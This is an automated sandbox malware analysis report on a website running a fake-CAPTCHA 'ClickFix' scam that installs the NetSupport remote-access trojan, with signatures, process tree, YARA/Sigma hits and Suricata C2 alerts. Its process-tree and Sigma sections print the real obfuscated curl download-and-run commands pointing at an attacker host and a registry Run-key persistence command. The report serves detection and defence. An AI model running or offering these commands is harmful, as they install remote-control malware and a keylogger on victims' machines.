Edit tour

Windows Analysis Report
http://fountainofhealth.ca

Overview

General Information

Sample URL:	http://fountainofhealth.ca
Analysis ID:	1704307
Infos:

Detection

NetSupport RAT, CAPTCHA Scam ClickFix

Score:	96
Range:	0 - 100
Confidence:	100%

Signatures

Detect drive by download via clipboard copy & paste

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected CAPTCHA Scam ClickFix

AI detected suspicious Javascript

HTML page adds supicious text to clipboard

HTML page contains obfuscated javascript

Installs a global event hook (focus changed)

Installs a global keyboard hook

Obfuscated command line found

Abnormal high CPU Usage

Creates a process in suspended mode (likely to inject code)

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTML page contains hidden javascript code

HTTP GET or POST without a user agent

Installs a global mouse hook

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Conhost Spawned By Uncommon Parent Process

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses reg.exe to modify the Windows registry

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2040 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6124 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 5888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca" MD5: E81F54E6C1129887AEA47E7D092680BF)

osk.exe (PID: 7428 cmdline: "C:\Windows\system32\osk.exe" MD5: 745F2DF5BEED97B8C751DF83938CB418)

osk.exe (PID: 7532 cmdline: "C:\Windows\system32\osk.exe" MD5: 745F2DF5BEED97B8C751DF83938CB418)

explorer.exe (PID: 4100 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

conhost.exe (PID: 5940 cmdline: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8012 cmdline: cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7320 cmdline: cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7332 cmdline: cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 7380 cmdline: curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 1476 cmdline: C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7400 cmdline: curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

tar.exe (PID: 4272 cmdline: tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire" MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24)

client32.exe (PID: 3988 cmdline: "C:\Users\user\AppData\Roaming\Dire\client32.exe" MD5: EE75B57B9300AAB96530503BFAE8A2F2)

reg.exe (PID: 428 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

conhost.exe (PID: 5068 cmdline: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5596 cmdline: cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 3536 cmdline: cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 7696 cmdline: cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 5672 cmdline: curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 2192 cmdline: C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 7400 cmdline: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4272 cmdline: cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 4092 cmdline: cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 1988 cmdline: cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 7700 cmdline: curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 7868 cmdline: C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\Dire\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\Dire\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\Dire\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author
00000020.00000000.1486224969.00000000007CF000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 3988	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
32.0.client32.exe.7c0000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.6.pages.csv	JoeSecurity_CAPTCHAScam	Yara detected CAPTCHA Scam/ ClickFix	Joe Security

Sigma Signatures

Sigma detected: Conhost Spawned By Uncommon Parent Process

Source: Process started

Author: Tim Rauch: Data: Command: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter, CommandLine: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter, CommandLine|base64offset|contains: , Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4100, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter, ProcessId: 5940, ProcessName: conhost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Dire\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PP1

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1476, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f, ProcessId: 428, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f, CommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1476, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f, ProcessId: 428, ProcessName: reg.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb, CommandLine: curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1476, ParentProcessName: cmd.exe, ProcessCommandLine: curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb, ProcessId: 7400, ProcessName: curl.exe

Suricata Signatures

ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (3dmaine .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-06-02T21:39:35.442336+0200	2062661	1	Exploit Kit Activity Detected	192.168.2.16	61172	1.1.1.1	53	UDP
2025-06-02T21:39:35.442682+0200	2062661	1	Exploit Kit Activity Detected	192.168.2.16	51757	1.1.1.1	53	UDP

ET EXPLOIT_KIT ZPHP Domain in TLS SNI (3dmaine .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-06-02T21:39:36.196801+0200	2062663	1	Exploit Kit Activity Detected	192.168.2.16	49722	107.180.51.102	443	TCP

ET MALWARE NetSupport RAT with System Information

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-06-02T21:41:07.903000+0200	2035894	1	A Network Trojan was detected	192.168.2.16	49773	94.158.245.140	443	TCP

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-06-02T21:40:21.417616+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:07.903000+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:16.152994+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:17.360011+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:17.562006+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:17.662996+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:17.764001+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:17.863981+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:17.965001+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.066235+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.165993+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.266988+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.366988+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.467986+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.567997+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.668992+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.768999+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.869999+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:18.971003+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.071064+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.171993+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.272306+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.373019+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.474070+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.575021+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.675006+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.776523+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.876005+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:19.977040+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.077010+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.177997+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.279001+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.379010+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.480708+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.580000+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.680001+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.780006+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.881005+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:20.980998+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.081001+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.181037+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.282009+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.384912+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.484949+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.584912+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.685010+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.785079+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.886025+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:21.987035+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.087028+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.188104+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.288029+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.389005+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.490010+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.590087+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.691013+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.792011+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.893400+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:22.994053+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.094017+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.196375+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.295291+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.396932+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.496910+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.597029+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.697082+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.798461+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.899727+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:23.999034+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:24.100913+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:24.199025+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:24.299024+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:24.400020+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:24.501026+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:24.602020+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:24.703011+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:24.803012+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:24.903039+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.004060+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.105044+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.207050+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.306023+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.406918+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.508923+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.608192+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.707382+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.808115+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:25.909882+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:26.010080+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:26.109017+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:26.210038+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:26.310021+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:26.411031+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:26.512078+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:26.613028+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:26.714492+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
